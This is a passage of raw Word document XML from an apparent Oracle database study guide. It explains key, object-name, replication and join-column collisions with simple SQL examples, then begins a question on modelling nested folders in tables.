      <w:bookmarkStart w:id="704" w:name="_Toc196308184"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a collision in the oracle database</w:t>
      </w:r>
      <w:r w:rsidR="008568CE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="704"/>
    </w:p>
    <w:p w14:paraId="4172697A" w14:textId="62FD2CE3" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">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In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Oracle database</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> typically refers to a situation where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two or more operations conflict with each other</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, often due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D453314" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A2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Primary Key or Unique Constraint Violation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5643A" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A2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When inserting or updating a record, if the new value </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conflicts with an existing key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like a duplicate primary key), it's considered a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679005E9" w14:textId="77777777" w:rsidR="004778D0" w:rsidRPr="00CE4B95" w:rsidRDefault="004778D0" w:rsidP="00786A20">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A2D65F" w14:textId="25AFE279" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A2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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BCD2F" w14:textId="77777777" w:rsidR="0044187E" w:rsidRPr="00CE4B95" w:rsidRDefault="0044187E" w:rsidP="00786A20">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSER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AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employees (employee_id, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nam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AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VALUE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1C00CF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>101</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C41A16"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'John'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="007400"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-- Inserting again with same employee_id will cause collision:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INSERT</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AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employees (employee_id, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nam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AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VALUES</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1C00CF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>101</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C41A16"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'Mike'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="007400"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-- ORA-00001: unique constraint violated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ABA360" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00786A20">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="46E70D6D">
          <v:rect id="_x0000_i2961" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA78B64" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A2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Object Name Collision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B5C5C" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A2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appens when trying to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>create a table, index, sequence, etc.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>name that already exists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the same namespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E7CB4" w14:textId="77777777" w:rsidR="000F08F7" w:rsidRPr="00CE4B95" w:rsidRDefault="000F08F7" w:rsidP="00786A20">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="AA0D91"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> employees (...); </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="007400"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-- If table already exists: ORA-00955: name is already used by an existing object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE90E9" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00786A20">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="28FAF5A0">
          <v:rect id="_x0000_i2962" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="674878D5" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A2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3. Data Replication/Import Conflict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62506F59" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">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During </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data replication, export/import, or data synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, collision can occur if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC9FB8" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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wo sources try to insert/update the same record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F182F62" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="144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here's a mismatch between source and target schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDE9EC4" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00786A2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EADCB99">
          <v:rect id="_x0000_i2963" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D88B8" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">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4. Column Name Collision in Joins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2A134" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00656FDC" w:rsidP="00786A20">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When joining tables and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>columns have the same name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without aliasing, Oracle throws ambiguity errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F4817" w14:textId="77777777" w:rsidR="00656FDC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00656FDC">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C688992">
          <v:rect id="_x0000_i2964" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497B782" w14:textId="023F7AB9" w:rsidR="00E7593A" w:rsidRPr="00CE4B95" w:rsidRDefault="00E7593A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="705" w:name="_Toc196308185"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If you create multiple folders one inside another and store one file into the last folder then how can you implement using database tables in oracle? How many tables are required?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="705"/>
    </w:p>
    <w:p w14:paraId="32A83A21" w14:textId="33AE30A1" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="004B58DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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o implement a structure where multiple folders are nested within each other, and a file is stored in the deepest folder, you would typically use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hierarchical structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This structure can be modeled using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Oracle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAE551" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="003B7F9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1. Folders Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC52C1"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is table stores the information about the folders. It will represent the folder hierarchy by maintaining a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent-child relationship</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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72"/>
        <w:gridCol w:w="1401"/>
        <w:gridCol w:w="4733"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w14:paraId="6EB5C551" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8F998B" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00275399">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Column Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="490244C2" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00275399">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ata Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7714A974" w14:textId="77777777" w:rsidR="003B7F92" w:rsidRPr="00CE4B95" w:rsidRDefault="003B7F92" w:rsidP="00275399">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3B7F92" w:rsidRPr="00CE4B95" w14:paraId="38402878" w14:textId="77777777" w:rsidTr="003B7F92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E5FB022"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lder_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F4DDFF"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UMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
